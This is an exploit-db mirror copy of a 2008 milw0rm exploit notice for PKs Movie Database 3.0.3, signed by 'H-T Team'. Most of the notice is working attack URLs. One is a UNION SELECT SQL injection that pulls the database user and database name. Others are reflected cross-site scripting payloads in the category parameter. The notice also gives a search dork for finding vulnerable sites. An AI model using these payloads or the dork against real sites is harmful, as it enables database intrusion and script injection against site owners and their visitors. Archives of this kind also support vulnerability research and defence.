exploit-db-mirror/exploits/php/webapps/5095.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

24 lines
No EOL
997 B
Text

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------
= Author : HouSSaMix From H-T Team
= Script : PKs Movie Database version 3.0.3
= Original advisory : http://www.securityfocus.com/bid/27713/
= BUG 1 : Remote SQL Injection Vulnerability
exploit => www.target.com/path/index.php?num=-1%20union%20select%201,2,3,4,5,6,user(),database(),9,10,11,12,13,14,15,16,17,18,19,20
= BUG 2 : XSS
exploit => www.target.com/path/index.php?category=[XSS]
www.target.com/path/index.php?num=9999999999&category=[XSS]
example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
= Dork : "PKs Movie Database"
# milw0rm.com [2008-02-10]